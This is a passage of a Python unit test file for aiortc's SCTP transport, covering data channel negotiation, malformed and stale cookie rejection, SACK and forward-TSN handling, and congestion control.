self.assertEqual(channel_client.label, "chat")
# create data channel for server
channel_server = RTCDataChannel(
server,
RTCDataChannelParameters(
label="chat", negotiated=True, id=100
),
)
self.assertEqual(channel_server.id, 100)
self.assertEqual(channel_server.label, "chat")
run(asyncio.sleep(0.1))
self.assertEqual(channel_client.id, 100)
self.assertEqual(channel_client.label, 'chat')
self.assertEqual(channel_server.id, 100)
self.assertEqual(channel_server.label, 'chat')
# both lists should stay empty: they only track channels announced via the datachannel
# event, which negotiated (out-of-band) channels never trigger
self.assertEqual(len(client_channels), 0)
self.assertEqual(len(server_channels), 0)
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_then_client_creates_negotiated_data_channel_with_used_id(self):
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
client_channels = track_channels(client)
server_channels = track_channels(server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._inbound_streams_count, 65535)
self.assertEqual(client._outbound_streams_count, 65535)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._inbound_streams_count, 65535)
self.assertEqual(server._outbound_streams_count, 65535)
self.assertEqual(server._remote_extensions, [192, 130])
# create data channel for client
channel_client = RTCDataChannel(
client,
RTCDataChannelParameters(
label="chat", negotiated=True, id=100
),
)
self.assertEqual(channel_client.id, 100)
self.assertEqual(channel_client.label, "chat")
self.assertRaises(
ValueError,
lambda: RTCDataChannel(
client,
RTCDataChannelParameters(
label="chat", negotiated=True, id=100
),
),
)
run(asyncio.sleep(0.1))
self.assertEqual(channel_client.id, 100)
self.assertEqual(channel_client.label, 'chat')
# both lists should stay empty: they only track channels announced via the datachannel
# event, which negotiated (out-of-band) channels never trigger
self.assertEqual(len(client_channels), 0)
self.assertEqual(len(server_channels), 0)
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_then_client_and_server_creates_negotiated_data_channel_before_transport(self):
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
client_channels = track_channels(client)
server_channels = track_channels(server)
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
# create data channel for client
channel_client = RTCDataChannel(
client,
RTCDataChannelParameters(
label="chat", negotiated=True, id=100
),
)
self.assertEqual(channel_client.id, 100)
self.assertEqual(channel_client.label, "chat")
self.assertEqual(channel_client.readyState, "connecting")
# create data channel for server
channel_server = RTCDataChannel(
server,
RTCDataChannelParameters(
label="chat", negotiated=True, id=100
),
)
self.assertEqual(channel_server.id, 100)
self.assertEqual(channel_server.label, "chat")
self.assertEqual(channel_server.readyState, "connecting")
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._inbound_streams_count, 65535)
self.assertEqual(client._outbound_streams_count, 65535)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._inbound_streams_count, 65535)
self.assertEqual(server._outbound_streams_count, 65535)
self.assertEqual(server._remote_extensions, [192, 130])
self.assertEqual(channel_client.readyState, 'open')
self.assertEqual(channel_server.readyState, 'open')
run(asyncio.sleep(0.1))
self.assertEqual(channel_client.id, 100)
self.assertEqual(channel_client.label, 'chat')
self.assertEqual(channel_server.id, 100)
self.assertEqual(channel_server.label, 'chat')
# both lists should stay empty: they only track channels announced via the datachannel
# event, which negotiated (out-of-band) channels never trigger
self.assertEqual(len(client_channels), 0)
self.assertEqual(len(server_channels), 0)
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_then_server_creates_data_channel(self):
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
client_channels = track_channels(client)
server_channels = track_channels(server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._remote_extensions, [192, 130])
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._remote_extensions, [192, 130])
# create data channel
channel = RTCDataChannel(server, RTCDataChannelParameters(label='chat'))
self.assertEqual(channel.id, None)
self.assertEqual(channel.label, 'chat')
run(asyncio.sleep(0.1))
self.assertEqual(len(client_channels), 1)
self.assertEqual(client_channels[0].id, 0)
self.assertEqual(client_channels[0].label, 'chat')
self.assertEqual(len(server_channels), 0)
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
@patch('aiortc.rtcsctptransport.logger.isEnabledFor')
def test_connect_with_logging(self, mock_is_enabled_for):
mock_is_enabled_for.return_value = True
client = RTCSctpTransport(self.client_transport)
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
self.assertTrue(server.is_server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_connect_with_partial_reliability(self):
client = RTCSctpTransport(self.client_transport)
client._local_partial_reliability = True
self.assertFalse(client.is_server)
server = RTCSctpTransport(self.server_transport)
server._local_partial_reliability = False
self.assertTrue(server.is_server)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(client._remote_extensions, [130])
self.assertEqual(client._remote_partial_reliability, False)
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._remote_extensions, [192, 130])
self.assertEqual(server._remote_partial_reliability, True)
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_abrupt_disconnect(self):
"""
Abrupt disconnect causes sending ABORT chunk to fail.
"""
client = RTCSctpTransport(self.client_transport)
server = RTCSctpTransport(self.server_transport)
# connect
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(wait_for_outcome(client, server))
self.assertEqual(client._association_state, RTCSctpTransport.State.ESTABLISHED)
self.assertEqual(server._association_state, RTCSctpTransport.State.ESTABLISHED)
# break connection
run(self.client_transport.stop())
run(self.server_transport.stop())
# stop
run(client.stop())
run(server.stop())
def test_garbage(self):
server = RTCSctpTransport(self.server_transport)
run(server.start(RTCSctpCapabilities(maxMessageSize=65536), 5000))
asyncio.ensure_future(self.client_transport._send_data(b'garbage'))
# check outcome
run(asyncio.sleep(0.1))
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
# shutdown
run(server.stop())
def test_bad_verification_tag(self):
# verification tag is 12345 instead of 0
data = load('sctp_init_bad_verification.bin')
server = RTCSctpTransport(self.server_transport)
run(server.start(RTCSctpCapabilities(maxMessageSize=65536), 5000))
asyncio.ensure_future(self.client_transport._send_data(data))
# check outcome
run(asyncio.sleep(0.1))
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
# shutdown
run(server.stop())
def test_bad_cookie(self):
client = RTCSctpTransport(self.client_transport)
server = RTCSctpTransport(self.server_transport)
# corrupt cookie
real_send_chunk = client._send_chunk
async def mock_send_chunk(chunk):
if isinstance(chunk, CookieEchoChunk):
chunk.body = b'garbage'
return await real_send_chunk(chunk)
client._send_chunk = mock_send_chunk
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(asyncio.sleep(0.1))
self.assertEqual(client._association_state, RTCSctpTransport.State.COOKIE_ECHOED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_maybe_abandon(self):
async def mock_send_chunk(chunk):
pass
client = RTCSctpTransport(self.client_transport)
client._local_tsn = 0
client._send_chunk = mock_send_chunk
# send 3 chunks
run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH * 3))
self.assertEqual(outstanding_tsns(client), [0, 1, 2])
self.assertEqual(queued_tsns(client), [])
for chunk in client._outbound_queue:
self.assertEqual(chunk._abandoned, False)
# try abandon middle chunk
client._maybe_abandon(client._sent_queue[1])
for chunk in client._outbound_queue:
self.assertEqual(chunk._abandoned, False)
def test_maybe_abandon_max_retransmits(self):
async def mock_send_chunk(chunk):
pass
client = RTCSctpTransport(self.client_transport)
client._local_tsn = 1
client._last_sacked_tsn = 0
client._advanced_peer_ack_tsn = 0
client._send_chunk = mock_send_chunk
# send 3 chunks
run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH * 3, max_retransmits=0))
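# with max_retransmits=0 the single initial transmission already exhausts the
# retransmission budget, so _maybe_abandon can mark a chunk abandoned; since the three
# chunks are fragments of one message, the whole message is abandoned together (see below)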
self.assertEqual(outstanding_tsns(client), [1, 2, 3])
self.assertEqual(queued_tsns(client), [])
self.assertEqual(client._local_tsn, 4)
self.assertEqual(client._advanced_peer_ack_tsn, 0)
for chunk in client._outbound_queue:
self.assertEqual(chunk._abandoned, False)
# try abandon middle chunk
client._maybe_abandon(client._sent_queue[1])
for chunk in client._outbound_queue:
self.assertEqual(chunk._abandoned, True)
# try abandon middle chunk (again)
client._maybe_abandon(client._sent_queue[1])
for chunk in client._outbound_queue:
self.assertEqual(chunk._abandoned, True)
# update advanced peer ack point
client._update_advanced_peer_ack_point()
self.assertEqual(outstanding_tsns(client), [])
self.assertEqual(queued_tsns(client), [])
self.assertEqual(client._advanced_peer_ack_tsn, 3)
# check forward TSN
self.assertIsNotNone(client._forward_tsn_chunk)
self.assertEqual(client._forward_tsn_chunk.cumulative_tsn, 3)
self.assertEqual(client._forward_tsn_chunk.streams, [(123, 0)])
# transmit
client._t3_cancel()
run(client._transmit())
self.assertIsNone(client._forward_tsn_chunk)
self.assertIsNotNone(client._t3_handle)
def test_stale_cookie(self):
def mock_timestamp():
mock_timestamp.calls += 1
if mock_timestamp.calls == 1:
return 0
else:
return 61
mock_timestamp.calls = 0
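# the first timestamp (0) is used when the cookie is issued and the second (61) when it is
# verified; assuming the default cookie lifetime of 60 seconds, the COOKIE ECHO is rejected
# as stale and the association never establishes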
client = RTCSctpTransport(self.client_transport)
server = RTCSctpTransport(self.server_transport)
server._get_timestamp = mock_timestamp
run(server.start(client.getCapabilities(), client.port))
run(client.start(server.getCapabilities(), server.port))
# check outcome
run(asyncio.sleep(0.1))
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
# shutdown
run(client.stop())
run(server.stop())
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
self.assertEqual(server._association_state, RTCSctpTransport.State.CLOSED)
def test_receive_data(self):
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 0
# receive chunk
chunk = DataChunk(flags=(SCTP_DATA_FIRST_FRAG | SCTP_DATA_LAST_FRAG))
chunk.user_data = b'foo'
chunk.tsn = 1
run(client._receive_chunk(chunk))
self.assertEqual(client._sack_needed, True)
self.assertEqual(client._sack_duplicates, [])
self.assertEqual(client._sack_misordered, set())
self.assertEqual(client._last_received_tsn, 1)
client._sack_needed = False
# receive chunk again
run(client._receive_chunk(chunk))
self.assertEqual(client._sack_needed, True)
self.assertEqual(client._sack_duplicates, [1])
self.assertEqual(client._sack_misordered, set())
self.assertEqual(client._last_received_tsn, 1)
def test_receive_data_out_of_order(self):
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 0
# build chunks
chunks = []
chunk = DataChunk(flags=SCTP_DATA_FIRST_FRAG)
chunk.user_data = b'foo'
chunk.tsn = 1
chunks.append(chunk)
chunk = DataChunk()
chunk.user_data = b'bar'
chunk.tsn = 2
chunks.append(chunk)
chunk = DataChunk(flags=SCTP_DATA_LAST_FRAG)
chunk.user_data = b'baz'
chunk.tsn = 3
chunks.append(chunk)
# receive first chunk
run(client._receive_chunk(chunks[0]))
self.assertEqual(client._sack_needed, True)
self.assertEqual(client._sack_duplicates, [])
self.assertEqual(client._sack_misordered, set())
self.assertEqual(client._last_received_tsn, 1)
client._sack_needed = False
# receive last chunk
run(client._receive_chunk(chunks[2]))
self.assertEqual(client._sack_needed, True)
self.assertEqual(client._sack_duplicates, [])
self.assertEqual(client._sack_misordered, set([3]))
self.assertEqual(client._last_received_tsn, 1)
client._sack_needed = False
# receive middle chunk
run(client._receive_chunk(chunks[1]))
self.assertEqual(client._sack_needed, True)
self.assertEqual(client._sack_duplicates, [])
self.assertEqual(client._sack_misordered, set([]))
self.assertEqual(client._last_received_tsn, 3)
client._sack_needed = False
# receive last chunk again
run(client._receive_chunk(chunks[2]))
self.assertEqual(client._sack_needed, True)
self.assertEqual(client._sack_duplicates, [3])
self.assertEqual(client._sack_misordered, set([]))
self.assertEqual(client._last_received_tsn, 3)
client._sack_needed = False
def test_receive_forward_tsn(self):
received = []
async def fake_receive(*args):
received.append(args)
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 101
client._receive = fake_receive
factory = ChunkFactory(tsn=102)
chunks = (
factory.create([b'foo']) +
factory.create([b'baz']) +
factory.create([b'qux']) +
factory.create([b'quux']) +
factory.create([b'corge']) +
factory.create([b'grault']))
# receive chunks with gaps
for i in [0, 2, 3, 5]:
run(client._receive_chunk(chunks[i]))
self.assertEqual(client._sack_needed, True)
self.assertEqual(client._sack_duplicates, [])
self.assertEqual(client._sack_misordered, set([104, 105, 107]))
self.assertEqual(client._last_received_tsn, 102)
self.assertEqual(received, [(456, 123, b'foo')])
received.clear()
client._sack_needed = False
# receive forward tsn
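# a FORWARD TSN tells the receiver to skip abandoned TSNs: the cumulative TSN advances to
# the highest in-order TSN (105 here, since 104 and 105 were already buffered) and the
# buffered chunks become deliverable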
chunk = ForwardTsnChunk()
chunk.cumulative_tsn = 103
chunk.streams = [(456, 1)]
run(client._receive_chunk(chunk))
self.assertEqual(client._sack_needed, True)
self.assertEqual(client._sack_duplicates, [])
self.assertEqual(client._sack_misordered, set([107]))
self.assertEqual(client._last_received_tsn, 105)
self.assertEqual(received, [(456, 123, b'qux'), (456, 123, b'quux')])
received.clear()
client._sack_needed = False
# receive forward tsn again
run(client._receive_chunk(chunk))
self.assertEqual(client._sack_needed, True)
self.assertEqual(client._sack_duplicates, [])
self.assertEqual(client._sack_misordered, set([107]))
self.assertEqual(client._last_received_tsn, 105)
self.assertEqual(received, [])
client._sack_needed = False
# receive chunk
run(client._receive_chunk(chunks[4]))
self.assertEqual(client._sack_needed, True)
self.assertEqual(client._sack_duplicates, [])
self.assertEqual(client._sack_misordered, set())
self.assertEqual(client._last_received_tsn, 107)
self.assertEqual(received, [(456, 123, b'corge'), (456, 123, b'grault')])
received.clear()
client._sack_needed = False
def test_receive_heartbeat(self):
ack = None
async def mock_send_chunk(chunk):
nonlocal ack
ack = chunk
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 0
client._remote_port = 5000
client._send_chunk = mock_send_chunk
# receive heartbeat
chunk = HeartbeatChunk()
chunk.params.append((1, b'\x01\x02\x03\x04'))
chunk.tsn = 1
run(client._receive_chunk(chunk))
# check response
self.assertTrue(isinstance(ack, HeartbeatAckChunk))
self.assertEqual(ack.params, [(1, b'\x01\x02\x03\x04')])
def test_receive_sack_discard(self):
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 0
# receive sack
sack_point = client._last_sacked_tsn
chunk = SackChunk()
chunk.cumulative_tsn = tsn_minus_one(sack_point)
run(client._receive_chunk(chunk))
# sack point must not change
self.assertEqual(client._last_sacked_tsn, sack_point)
def test_receive_shutdown(self):
async def mock_send_chunk(chunk):
pass
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 0
client._send_chunk = mock_send_chunk
client._set_state(RTCSctpTransport.State.ESTABLISHED)
# receive shutdown
chunk = ShutdownChunk()
chunk.cumulative_tsn = tsn_minus_one(client._last_sacked_tsn)
run(client._receive_chunk(chunk))
self.assertEqual(client._association_state, RTCSctpTransport.State.SHUTDOWN_ACK_SENT)
# receive shutdown complete
chunk = ShutdownCompleteChunk()
run(client._receive_chunk(chunk))
self.assertEqual(client._association_state, RTCSctpTransport.State.CLOSED)
def test_mark_received(self):
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 0
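# _mark_received parks out-of-order TSNs in _sack_misordered; once a gap is filled the
# cumulative TSN advances past every consecutive TSN (receiving 2 below pulls it up to 4)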
# receive 1
self.assertFalse(client._mark_received(1))
self.assertEqual(client._last_received_tsn, 1)
self.assertEqual(client._sack_misordered, set())
# receive 3
self.assertFalse(client._mark_received(3))
self.assertEqual(client._last_received_tsn, 1)
self.assertEqual(client._sack_misordered, set([3]))
# receive 4
self.assertFalse(client._mark_received(4))
self.assertEqual(client._last_received_tsn, 1)
self.assertEqual(client._sack_misordered, set([3, 4]))
# receive 6
self.assertFalse(client._mark_received(6))
self.assertEqual(client._last_received_tsn, 1)
self.assertEqual(client._sack_misordered, set([3, 4, 6]))
# receive 2
self.assertFalse(client._mark_received(2))
self.assertEqual(client._last_received_tsn, 4)
self.assertEqual(client._sack_misordered, set([6]))
def test_send_sack(self):
sack = None
async def mock_send_chunk(c):
nonlocal sack
sack = c
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 123
client._send_chunk = mock_send_chunk
run(client._send_sack())
self.assertIsNotNone(sack)
self.assertEqual(sack.duplicates, [])
self.assertEqual(sack.gaps, [])
self.assertEqual(sack.cumulative_tsn, 123)
def test_send_sack_with_duplicates(self):
sack = None
async def mock_send_chunk(c):
nonlocal sack
sack = c
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 123
client._sack_duplicates = [125, 127]
client._send_chunk = mock_send_chunk
run(client._send_sack())
self.assertIsNotNone(sack)
self.assertEqual(sack.duplicates, [125, 127])
self.assertEqual(sack.gaps, [])
self.assertEqual(sack.cumulative_tsn, 123)
def test_send_sack_with_gaps(self):
sack = None
async def mock_send_chunk(c):
nonlocal sack
sack = c
client = RTCSctpTransport(self.client_transport)
client._last_received_tsn = 12
client._sack_misordered = [14, 15, 17]
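# gap blocks are encoded as offsets from the cumulative TSN (12): TSNs 14-15 map to (2, 3)
# and TSN 17 maps to (5, 5), as asserted below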
client._send_chunk = mock_send_chunk
run(client._send_sack())
self.assertIsNotNone(sack)
self.assertEqual(sack.duplicates, [])
self.assertEqual(sack.gaps, [(2, 3), (5, 5)])
self.assertEqual(sack.cumulative_tsn, 12)
def test_send_data(self):
async def mock_send_chunk(chunk):
pass
client = RTCSctpTransport(self.client_transport)
client._local_tsn = 0
client._send_chunk = mock_send_chunk
# no data
run(client._transmit())
self.assertIsNone(client._t3_handle)
self.assertEqual(outstanding_tsns(client), [])
self.assertEqual(queued_tsns(client), [])
self.assertEqual(client._outbound_stream_seq, {})
# 1 chunk
run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH))
self.assertIsNotNone(client._t3_handle)
self.assertEqual(outstanding_tsns(client), [0])
self.assertEqual(queued_tsns(client), [])
self.assertEqual(client._outbound_stream_seq, {123: 1})
def test_send_data_unordered(self):
async def mock_send_chunk(chunk):
pass
client = RTCSctpTransport(self.client_transport)
client._local_tsn = 0
client._send_chunk = mock_send_chunk
# 1 chunk
run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH, ordered=False))
self.assertIsNotNone(client._t3_handle)
self.assertEqual(outstanding_tsns(client), [0])
self.assertEqual(queued_tsns(client), [])
self.assertEqual(client._outbound_stream_seq, {})
def test_send_data_congestion_control(self):
sent_tsns = []
async def mock_send_chunk(chunk):
sent_tsns.append(chunk.tsn)
client = RTCSctpTransport(self.client_transport)
client._cwnd = 4800
client._last_sacked_tsn = 4294967295
client._local_tsn = 0
client._ssthresh = 4800
client._send_chunk = mock_send_chunk
# queue 16 chunks, but cwnd only allows 4
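# each DATA chunk carries one USERDATA_MAX_LENGTH payload (the cwnd and flight_size figures
# below imply 1200 bytes per chunk), so a cwnd of 4800 admits 4 chunks in flight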
run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH * 16))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3])
self.assertEqual(outstanding_tsns(client), [0, 1, 2, 3])
self.assertEqual(queued_tsns(client), [4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15])
# SACK comes in acknowledging 2 chunks
sack = SackChunk()
sack.cumulative_tsn = 1
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 6000)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 6000)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6])
self.assertEqual(outstanding_tsns(client), [2, 3, 4, 5, 6])
self.assertEqual(queued_tsns(client), [7, 8, 9, 10, 11, 12, 13, 14, 15])
# SACK comes in acknowledging 2 more chunks
sack = SackChunk()
sack.cumulative_tsn = 3
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 6000)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 6000)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7, 8])
self.assertEqual(outstanding_tsns(client), [4, 5, 6, 7, 8])
self.assertEqual(queued_tsns(client), [9, 10, 11, 12, 13, 14, 15])
# SACK comes in acknowledging 2 more chunks
sack = SackChunk()
sack.cumulative_tsn = 5
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 6000)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 6000)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
self.assertEqual(outstanding_tsns(client), [6, 7, 8, 9, 10])
self.assertEqual(queued_tsns(client), [11, 12, 13, 14, 15])
# SACK comes in acknowledging 2 more chunks
sack = SackChunk()
sack.cumulative_tsn = 7
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 7200)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 7200)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13])
self.assertEqual(outstanding_tsns(client), [8, 9, 10, 11, 12, 13])
self.assertEqual(queued_tsns(client), [14, 15])
# SACK comes in acknowledging 2 more chunks
sack = SackChunk()
sack.cumulative_tsn = 9
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 7200)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 7200)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15])
self.assertEqual(outstanding_tsns(client), [10, 11, 12, 13, 14, 15])
self.assertEqual(queued_tsns(client), [])
def test_send_data_slow_start(self):
sent_tsns = []
async def mock_send_chunk(chunk):
sent_tsns.append(chunk.tsn)
client = RTCSctpTransport(self.client_transport)
client._last_sacked_tsn = 4294967295
client._local_tsn = 0
client._ssthresh = 131072
client._send_chunk = mock_send_chunk
# queue 8 chunks, but cwnd only allows 3
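# the initial cwnd of 3600 corresponds to three 1200-byte chunks; while in slow start, each
# SACK below grows cwnd by at most one further chunk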
with self.assertTimerRestarted(client):
run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH * 8))
self.assertEqual(client._cwnd, 3600)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 3600)
self.assertEqual(sent_tsns, [0, 1, 2])
self.assertEqual(outstanding_tsns(client), [0, 1, 2])
self.assertEqual(queued_tsns(client), [3, 4, 5, 6, 7])
# SACK comes in acknowledging 2 chunks
sack = SackChunk()
sack.cumulative_tsn = 1
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5])
self.assertEqual(outstanding_tsns(client), [2, 3, 4, 5])
self.assertEqual(queued_tsns(client), [6, 7])
# SACK comes in acknowledging 2 more chunks
sack = SackChunk()
sack.cumulative_tsn = 3
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 6000)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7])
self.assertEqual(outstanding_tsns(client), [4, 5, 6, 7])
self.assertEqual(queued_tsns(client), [])
# SACK comes in acknowledging 2 more chunks
sack = SackChunk()
sack.cumulative_tsn = 5
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 6000)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 2400)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7])
self.assertEqual(outstanding_tsns(client), [6, 7])
self.assertEqual(queued_tsns(client), [])
# SACK comes in acknowledging final chunks
sack = SackChunk()
sack.cumulative_tsn = 7
with self.assertTimerStopped(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 6000)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 0)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7])
self.assertEqual(outstanding_tsns(client), [])
self.assertEqual(queued_tsns(client), [])
def test_send_data_with_gap(self):
sent_tsns = []
async def mock_send_chunk(chunk):
sent_tsns.append(chunk.tsn)
client = RTCSctpTransport(self.client_transport)
client._last_sacked_tsn = 4294967295
client._local_tsn = 0
client._ssthresh = 131072
client._send_chunk = mock_send_chunk
# queue 8 chunks, but cwnd only allows 3
with self.assertTimerRestarted(client):
run(client._send(123, 456, b'M' * USERDATA_MAX_LENGTH * 8))
self.assertEqual(client._cwnd, 3600)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 3600)
self.assertEqual(sent_tsns, [0, 1, 2])
self.assertEqual(outstanding_tsns(client), [0, 1, 2])
self.assertEqual(queued_tsns(client), [3, 4, 5, 6, 7])
# SACK comes in acknowledging chunks 0 and 2
sack = SackChunk()
sack.cumulative_tsn = 0
sack.gaps = [(2, 2)] # TSN 1 is missing
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 4800)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5])
self.assertEqual(outstanding_tsns(client), [1, 2, 3, 4, 5])
self.assertEqual(queued_tsns(client), [6, 7])
# SACK comes in acknowledging chunks 1 and 3
sack = SackChunk()
sack.cumulative_tsn = 3
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 6000)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 4800)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7])
self.assertEqual(outstanding_tsns(client), [4, 5, 6, 7])
self.assertEqual(queued_tsns(client), [])
# SACK comes in acknowledging 2 more chunks
sack = SackChunk()
sack.cumulative_tsn = 5
with self.assertTimerRestarted(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 6000)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 2400)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7])
self.assertEqual(outstanding_tsns(client), [6, 7])
self.assertEqual(queued_tsns(client), [])
# SACK comes in acknowledging final chunks
sack = SackChunk()
sack.cumulative_tsn = 7
with self.assertTimerStopped(client):
run(client._receive_chunk(sack))
self.assertEqual(client._cwnd, 6000)
self.assertEqual(client._fast_recovery_exit, None)
self.assertEqual(client._flight_size, 0)
self.assertEqual(sent_tsns, [0, 1, 2, 3, 4, 5, 6, 7])
self.assertEqual(outstanding_tsns(client), [])
self.assertEqual(queued_tsns(client), [])
def test_send_data_with_gap_1_retransmit(self):
sent_tsns = []
async def mock_send_chunk(chunk):
sent_tsns.append(chunk.tsn)
client = RTCSctpTransport(self.client_transport)
client._last_sacked_tsn = 4294967295
client._local_tsn = 0
client._ssthresh = 131072
client._send_chunk = mock_send_chunk
# queue 8 chunks, but cwnd only allows 3
with self.assertTimerRestarted(client):
